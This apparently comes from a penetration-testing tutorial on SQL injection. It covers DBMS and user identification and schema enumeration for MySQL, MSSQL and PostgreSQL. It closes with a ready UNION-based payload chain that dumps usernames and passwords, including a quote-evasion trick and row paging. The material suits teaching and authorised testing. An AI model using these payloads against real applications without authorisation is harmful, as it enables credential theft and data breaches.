Database Enumeration

Enumerating database information and dumping tables

Database enumeration and dumping is a crucial step of SQL injection testing once the vulnerability has been confirmed. It lets us map the databases, tables and columns the application can reach and extract sensitive data such as user credentials.

Database Identification

The first step is to identify the type and version of the database management system (DBMS) we are interacting with. MySQL and MSSQL both answer to @@version; the format of the returned string tells them apart (MSSQL returns a string beginning with "Microsoft SQL Server"):

MySQL:

SELECT @@version;

MSSQL:

SELECT @@version;

PostgreSQL:

SELECT version();

Database User

It is also useful to enumerate the database account the web application connects as, since its privileges bound what the later enumeration steps can reach.

MySQL:

SELECT USER();
SELECT CURRENT_USER();
SELECT CURRENT_USER;
SELECT SESSION_USER();

MSSQL:

SELECT CURRENT_USER;
SELECT user_name();
SELECT system_user;
SELECT user;

PostgreSQL:

SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;  -- lists every role, not just the current one
SELECT getpgusername();

Database Schema

The database schema is the structure of the database: the databases, tables and columns it contains. We can use the SQL injection to dump that structure and locate the tables and columns that matter for the engagement. DB_NAME, TB_NAME and <SCHEMA_NAME> in the queries below are placeholders for values found in the previous step.

MSSQL:

Database names:

SELECT name FROM master..sysdatabases;
SELECT name FROM master.sys.databases;

Table names (run against the database that holds the tables, DB_NAME):

SELECT name FROM DB_NAME..sysobjects WHERE xtype = 'U';

Column names (shown for a table in master; substitute the target database):

SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';

MySQL:

Database names:

SELECT schema_name FROM information_schema.schemata;

Table names:

SELECT table_name FROM information_schema.tables WHERE table_schema='DB_NAME';

Column names:

SELECT column_name FROM information_schema.columns WHERE table_schema='DB_NAME' AND table_name='TB_NAME';

PostgreSQL:

Database names:

SELECT datname FROM pg_database;

Table names:

SELECT table_name FROM information_schema.tables WHERE table_schema='<SCHEMA_NAME>';

Column names:

SELECT column_name FROM information_schema.columns WHERE table_name='data_table';

Dumping data

After identifying the databases, tables and columns, we can dump their contents with ordinary SELECT statements injected into the vulnerable query.

Example:

SELECT username, password FROM users;
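The queries above are written as stand-alone statements; in practice they are embedded in the vulnerable query. The following is an added example, not code from the original page, that walks the whole chain (DBMS and user identification, schema enumeration, data dump) as UNION-based payloads for MySQL, with a PostgreSQL variant of the final step. It assumes a vulnerable query of the form SELECT id, name, price FROM products WHERE id = <input> (three columns, the second rendered in the page), a target schema called shop with a table users holding username and password columns, and an application account that can read information_schema; all of those names are assumptions for the illustration.

```sql
-- Added example, not from the original page. Assumed vulnerable query:
--   SELECT id, name, price FROM products WHERE id = <input>
-- Each line below is the value placed at <input>. NULL pads the UNION to the
-- three columns the original query returns, and the result lands in the
-- second column, which the page displays. "-- -" comments out the remainder
-- of the original query (MySQL needs a space after the double dash).

-- 1. DBMS type/version and the account we run as, in one request.
1 UNION SELECT NULL, CONCAT(@@version, ' | ', CURRENT_USER()), NULL-- -

-- 2. Database (schema) names; GROUP_CONCAT collapses all rows into one value.
1 UNION SELECT NULL, GROUP_CONCAT(schema_name), NULL
        FROM information_schema.schemata-- -

-- 3. Tables in the schema of interest (assumed name: shop).
1 UNION SELECT NULL, GROUP_CONCAT(table_name), NULL
        FROM information_schema.tables WHERE table_schema='shop'-- -

-- 4. Columns and their types for the target table (assumed name: users).
1 UNION SELECT NULL, GROUP_CONCAT(column_name, ':', data_type), NULL
        FROM information_schema.columns
        WHERE table_schema='shop' AND table_name='users'-- -

-- 5. Dump the rows. 0x3a is ':' written as a hex literal, so the payload
--    still works when the application strips or escapes quote characters.
1 UNION SELECT NULL, GROUP_CONCAT(username, 0x3a, password SEPARATOR '\n'), NULL
        FROM shop.users-- -

-- GROUP_CONCAT output is cut at group_concat_max_len (1024 bytes by default).
-- If the dump is truncated, or the page only shows one row, page through
-- the table one row at a time with LIMIT/OFFSET instead:
1 UNION SELECT NULL, CONCAT(username, 0x3a, password), NULL
        FROM shop.users ORDER BY username LIMIT 1 OFFSET 0-- -
1 UNION SELECT NULL, CONCAT(username, 0x3a, password), NULL
        FROM shop.users ORDER BY username LIMIT 1 OFFSET 1-- -

-- PostgreSQL variant of step 5: string_agg replaces GROUP_CONCAT, || is the
-- concatenation operator, E'\n' is an escaped newline, and a bare "--" ends
-- the line. The same NULL padding applies.
1 UNION SELECT NULL, string_agg(username || ':' || password, E'\n'), NULL
        FROM users--
```

Before running the chain, confirm the column count and which column is rendered (for instance with ORDER BY n or a UNION SELECT of NULLs), otherwise every payload above fails with a column-count or type mismatch error.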
